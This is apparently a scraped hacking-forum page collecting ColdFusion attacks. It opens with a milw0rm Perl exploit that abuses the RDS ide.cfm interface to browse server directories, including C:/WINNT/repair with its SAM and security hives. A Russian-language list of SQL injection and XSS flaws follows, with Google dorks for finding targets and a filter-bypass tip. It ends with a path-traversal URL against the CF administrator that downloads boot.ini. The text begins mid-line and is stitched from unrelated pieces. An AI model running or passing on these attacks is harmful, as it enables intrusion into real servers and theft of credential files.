Jul 2003 10:30:43 GMT # # HTTP/1.1 200 OK # Server: Microsoft-IIS/5.0 # Date: Tue, 01 Jul 2003 10:30:43 GMT # Connection: close # Content-Type: text/html # # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0, # 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0, # 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0, # 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0 # Vic7im1@cipher:~/Scripts/RDS_Sploit$ # ---------------------------------- use strict; use IO::Socket; use vars qw($response @clength @rarray); ## Dreamweaver string requests to ide.cfm ## -------------------------------------- #1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28 #3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47 #4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32 #6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50 #7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51 #9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24 #11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53 #13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53 #15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51 #17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29 #19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37 # Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know # the $string_val. @clength = ( "Content-Length: 46", "Content-Length: 28", "Content-Length: 47", "Content-Length: 46", #"Content-Length: 32", #"Content-Length: 50", "Content-Length: 46", "Content-Length: 51", "Content-Length: 46", "Content-Length: 24", "Content-Length: 46", "Content-Length: 53", "Content-Length: 46", "Content-Length: 53", "Content-Length: 46", "Content-Length: 51", "Content-Length: 46", "Content-Length: 29", "Content-Length: 46", "Content-Length: 37" ); @rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:7:C:/_mm/STR:1:*STR:0:", "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", #"3:STR:10:C:/_notes/STR:1:*STR:0:", #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:3:C:/STR:1:*STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:" ); system("clear"); # change target addy below. my $TARGET = "192.168.0.100"; my $PORT = "80"; my $STRING = "C:/WINNT/repair"; my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n"; print "Generating Socket with Array Directory Values.\n"; my ( $i, $c); for ( $i = 0; $i < @rarray; $i++ ) { for ( $c = 0; $c < @clength; $c++ ) { if( $i == $c ) { &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]); } } } sub gen_sock() { my $sock = new IO::Socket::INET(PeerAddr => $TARGET, PeerPort => $PORT, Proto => 'tcp', ); die "Socket Could not be established ! $!" unless $sock; print "Target: $TARGET:$PORT\n"; print "$POST\n"; print "Request String Value: $rarray[$i]\n"; print "$clength[$c]\n"; print "Please wait.. ..\n"; print $sock "$POST"; print $sock "Content-Type: application/x-ColdFusionIDE\r\n"; print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n"; print $sock "Host: $TARGET\r\n"; print $sock "$clength[$c]\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n"; print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n"; print $sock "\r\n"; print $sock "$rarray[$i]"; # lets return and print data to term while($response = <$sock>) { chomp($response); print "$response\n"; } close($sock); } # milw0rm.com [2003-07-07]
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability admin_username: admin_password: admin: dork: allinurl: Details.cfm?ProdID= allinurl: Results.cfm?category= QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability admin password: link admin: XSS в Savvy Content Manager Уязвимость существует из-за недостаточной обработки входных данных в параметре "searchterms" в сценариях searchresults.cfm, search_results.cfm и search_results/index.cfm. Example: XSS в Tradingeye Shop Уязвимость существует из-за недостаточной обработки входных данных в параметре "image" в сценарии details.cfm. Example: XSS в iPostMX 2005 Уязвимость существует из-за недостаточной обработки входных данных в параметре "RETURNURL" в сценариях userlogin.cfm и account.cfm. Example: XSS в Goss iCM Уязвимость существует из-за недостаточной обработки входных данных в параметре "keyword" в сценарии index.cfm. Example: SQL-Inj в 1WebCalendar Уязвимость существует из-за недостаточной обработки входных данных в параметре "EventID" в сценарии "viewEvent.cfm", в параметре "NewsID" в сценарии "news/newsView.cfm" и параметре "ThisDate" в сценарии "mainCal.cfm". Example: XSS в CommonSpot Уязвимость существует из-за недостаточной обработки входных данных в параметре "bNewWindow" в сценарии "loader.cfm". Example: XSS в e-publish Уязвимость существует из-за недостаточной обработки входных данных в параметрах "obcatid" и "comid" в сценарии "show.cfm". Example: Примечание: не раз уже сталкивался с тем, что когда мы подставляем <script>alert()</script>, то в сорсе открывающий тег заменяется на <InvalidTag>. Обходится очень просто, пример выше. XSS в Honeycomb Archive Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "keyword" в сценарии "search.cfm". Example: XSS в Hot Banana Web Content Management Suite Уязвимость существует из-за недостаточной обработки входных данных в параметре "keywords" сценария "index.cfm". Example: XSS в CF_Nuke Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметрах "cat", "topic" и "newsid". Example: SQL-Inj в Magic Forum Personal Уязвимость существует при обработке входных данных в параметрах "ForumID", "Thread" и "ThreadID" в сценарии "view_forum.cfm". Example: XSS в Simple Message Board Уязвимость существует из-за недостаточной обработки входных данных в сценариях 'forum.cfm', 'user.cfm', thread.cfm' и 'search.cfm'. Example: XSS в Quick Cart Уязвимость существует из-за некорректной обработки входных данных в параметре 'search' сценария 'search.cfm'. Example: XSS в FuseTalk Уязвимость существует из-за некорректной обработки входных данных в параметре 'ProfileID' модуля 'tombstone.cfm'. Example:
еще одна "бага" если можно так, в админке в секции логирования, вместо логов можно скачать к себе любой файл из ФС http://www.site.com/cfide/administrator/logging/downloadlog.cfm?logfile=../../../../boot.ini никакой проверки нету, уязвимость присувствует в версии 7, в других версиях не проверял, если получится проверить отпишусь уязвимый код Code: <cfheader name="Content-Disposition" value="attachment;filename=#url.log#"> <cfheader name="Content-Description" value="This is a comma-delimited file."> <cfcontent file="#LogDir#/#url.log#" type="application/x-unknown"> видно что переменная #url.log# никак не проверяется
